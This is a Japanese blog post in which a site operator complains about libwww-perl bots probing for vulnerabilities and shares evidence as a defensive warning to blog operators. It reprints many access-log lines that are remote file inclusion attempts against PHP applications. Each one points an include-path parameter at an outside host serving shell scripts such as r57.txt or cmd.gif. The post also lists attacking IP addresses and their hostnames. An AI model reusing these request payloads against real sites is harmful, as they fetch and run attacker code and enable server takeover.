libwww-perl は不正アクセス専門ツールと化した (´Α`)キエロヨ

libwww-perl なんだけども、最近、不正アクセスに悪用されることが多いようだ。
このサイトにも User-Agent を libwww-perl としたホストが大量に変な URI を求めてくる。
チョーウザイんですけどっっっ!! (-∀ー#)

ブログサイトなんかの脆弱性を探しているカンジ。ブログを運営しているところは気をつけよう。

アクセスログはこんなかんじ

"GET / HTTP/1.1"
"GET //administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://213.133.108.122/alex.gif? HTTP/1.1"
"GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://realhack.altervista.org/iniez.txt? HTTP/1.1"
"GET //bb_func_txt.php?pathToFiles=http://213.133.108.122/alex.gif? HTTP/1.1"
"GET //forum.php?cfg_file=1&fpath=http://goblok.10e.net/r57.txt?? HTTP/1.1"
"GET //inc/output/news_theme1.php?abs_path=http://213.133.108.122/alex.gif? HTTP/1.1"
"GET //include/menu_builder.php?config[page_dir]=http://www.freewebtown.com/pks2/sp.txt? HTTP/1.1"
"GET //includes/dbal.php?eqdkp_root_path=http://213.133.108.122/alex.gif? HTTP/1.1"
"GET //master.php?root_path=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"
"GET //sw/index_sw.php?doc_directory=http://utenti.lycos.it/fvmatoz/r.jpg? HTTP/1.1"
"GET //template.php?actionsPage=http://goblok.10e.net/r57.txt?? HTTP/1.1"
"GET /@rfiscanhttp://www.sedjk-pro.com/new.txt? HTTP/1.1"
"GET /admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"
"GET /admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://clubmusic.caucasus.net/administrator/cmd.gif? HTTP/1.1"
"GET /admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://www.clubmusic.caucasus.net/administrator/cmd.gif? HTTP/1.1"
"GET /admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://tinypath.com/sdy/test/iso.txt? HTTP/1.0"
"GET /admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"
"GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://realhack.altervista.org/iniez.txt? HTTP/1.1"
"GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://clubmusic.caucasus.net/administrator/cmd.gif? HTTP/1.1"
"GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"
"GET /forum/track.php?path=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"
"GET /functions.php?pmp_rel_path=http://goblok.10e.net/r57.txt?? HTTP/1.1"
"GET /functions.php?pmp_rel_path=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"
"GET /images/smileys/smileys_packs.php?smileys_dir=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"
"GET /include/copyright.php?tsep_config[absPath]=%20%22Powered%20Byhttp://www.jizni-cechy.cz/unknowns/cmd.txt?? HTTP/1.1"
"GET /include/disp_form.php3?cfg_include_dir=http://clubmusic.caucasus.net/administrator/cmd.gif? HTTP/1.1"
"GET /include/disp_form.php3?cfg_include_dir=http://tinypath.com/sdy/test/iso.txt? HTTP/1.0"
"GET /include/disp_form.php3?cfg_include_dir=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"
"GET /include/disp_smileys.php3?cfg_include_dir=http://tinypath.com/sdy/test/iso.txt? HTTP/1.0"
"GET /include/disp_smileys.php3?cfg_include_dir=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"
"GET /include/index.php3?cfg_include_dir=http://clubmusic.caucasus.net/administrator/cmd.gif? HTTP/1.1"
"GET /include/index.php3?cfg_include_dir=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"
"GET /include/little_news.php3?cfg_include_dir=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"
"GET /index.php?classified_path=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"
"GET /module/forum/main.php?id=1&main_dir=http://tinypath.com/sdy/test/iso.txt? HTTP/1.0"
"GET /module/forum/main.php?id=1&main_dir=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"
"GET /process.php?DEFAULT_SKIN=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"
"GET /register.php?base_dir=http://clubmusic.caucasus.net/administrator/cmd.gif? HTTP/1.1"
"GET /template/purpletech/base_include.php?page=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"
"GET /track.php?path=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"
"GET /webyep-system/programm/elements/WYGalleryElement.php?webyep_sIncludePath=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"
"GET /webyep-system/programm/lib/WYApplication.php?webyep_sIncludePath=http://goblok.10e.net/r57.txt?? HTTP/1.1"
"GET /webyep-system/programm/lib/WYApplication.php?webyep_sIncludePath=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"
"GET /webyep-system/programm/lib/WYApplication.php?webyep_sIncludePath=http://www.olimpicatkdrende.net/tab/cmd.gif? HTTP/1.1"
"GET /webyep-system/programm/lib/WYDocument.php?webyep_sIncludePath=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"
"GET /webyep-system/programm/webyep.php?webyep_sIncludePath=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"

User-Agent は libwww-perl ばっか。。。バージョンが微妙にちゃうけど。

"libwww-perl/5.53"
"libwww-perl/5.64"
"libwww-perl/5.65"
"libwww-perl/5.69"
"libwww-perl/5.75"
"libwww-perl/5.76"
"libwww-perl/5.79"
"libwww-perl/5.803"
"libwww-perl/5.805"

発信源(送信元)はこんなカンジ。。。もちろん Firewall で drop してやったよ。 (・∀・)ネニチリーン
あ、、、「ns.hatena.ne.jp.」ってのも混じってるなぁ。ま、いいか。

回数 IP アドレス
1101 216.193.201.201 crete.globat.com.
984 134.58.253.113 webcache-kulnet-1.kuleuven.ac.be.
756 70.85.53.68 eiteasy.com.
434 128.242.106.42 NXDOMAIN
401 209.151.83.128 pacman.vosn.net.
398 202.71.102.106 NXDOMAIN
389 216.193.201.51 sumatra.globat.com.
373 203.98.189.20 beta.zentek.net.
284 64.27.16.86 NXDOMAIN
283 69.26.178.141 omega.sitelutions.com.
282 203.22.204.146 iwojima.globat.com.
227 205.234.146.11 unknown.ord.scnet.net.
210 217.160.230.167 infong385.us.perfora.net.
205 64.182.122.88 88-122-182-64.cust.propagation.net.
191 69.64.50.67 air873.startdedicated.com.
170 203.146.140.221 NXDOMAIN
161 84.40.23.81 ns2.stantdesign.com.
144 72.232.69.250 250.69.232.72.reverse.layeredtech.com.
120 203.88.114.169 AT-92P8L1S.rtds.aussiehq.net.au.
86 81.208.101.196 81-208-101-196.ip.fastwebnet.it.
86 216.239.90.42 ip216-239-90-42.vif.net.
85 198.145.14.39 ip39.14.ded-srv.ptldor2.iinet.com.
70 209.172.33.237 ip-209-172-33-237.reverse.privatedns.com.
62 72.232.237.58 58.237.232.72.reverse.layeredtech.com.
58 65.254.46.145 fortitude.dixievalley.net.
58 209.51.200.106 NXDOMAIN
56 193.74.151.49 NXDOMAIN
49 69.93.147.242 f2.93.5d45.static.theplanet.com.
49 202.57.128.155 202.57.128.155.sta.isp-thailand.com.
39 207.150.180.18 ns1.atnsystems1.com.
38 217.71.122.120 NXDOMAIN
36 81.219.55.132 virt01.vpol.pl.
35 83.243.43.89 datenchef.de.
31 70.85.186.50 ns.3kserver7.com.
31 69.72.240.66 fox.whbdns.com.
31 65.98.61.226 server145.atlaspronet.com.
28 217.96.16.149 NXDOMAIN
25 89.234.63.106 assigned.061006.
23 202.158.89.67 ip89-67.cbn.net.id.
22 69.93.84.170 tango.yamx.com.
19 83.143.86.170 cika.info.
19 205.234.145.211 unknown.ord.scnet.net.
16 87.238.162.28 be7.1-eurohost.com.
14 72.29.69.119 72-29-69-119.static.dimenoc.com.
13 195.39.164.196 NXDOMAIN
12 62.152.64.210 www.ddt.ru.
10 205.178.145.65 vux.bos.netsolhost.com.
10 150.140.140.91 prlab.ceid.upatras.gr.
7 81.177.16.141 limbakh-a.majordomo.ru.
7 69.13.180.28 sbtsgroup.propagation.net.
7 65.254.51.186 usabr-datacenter.net.
7 64.27.87.160 dns1.exemplarwebs.net.
7 195.228.155.60 jss.hu.
6 146.101.136.71 lists2.shootingpeople.org.
6 134.58.253.56 kulnet-nat-1.kuleuven.net.
5 85.25.133.213 alpha995.server4you.de.
5 220.229.60.4 adsl-220-229-60-4.NH.sparqnet.net.
4 82.179.86.114 NXDOMAIN
4 67.18.220.130 ns.interwebserver.com.
4 207.150.180.75 unknown.sagonet.net.
4 148.210.135.21 cig.uacj.mx.
3 85.92.71.187 server7.simplewebserver.co.uk.
3 83.223.107.18 83-223-107-18.as29017.net.
3 62.193.226.57 wpc0963.amenworld.com.
3 200.247.141.68 141068.static.fln.virtua.com.br.
3 128.121.126.69 nextlinemedia7.securesites.net.
2 83.217.84.73 83-217-84-73.realroot.be.
2 210.166.211.216 ns.personaware.gr.jp.
2 153.19.55.194 NXDOMAIN
1 87.230.1.89 uestuendag.com.
1 72.29.64.122 72-29-64-122.static.dimenoc.com.
1 24.91.54.6 sipan.hsd1.ma.comcast.net.
1 221.186.146.26 ns.hatena.ne.jp.
1 218.232.110.175 NXDOMAIN
1 194.204.11.65 www.virtuaal.ee.
タイトルとURLをコピーしました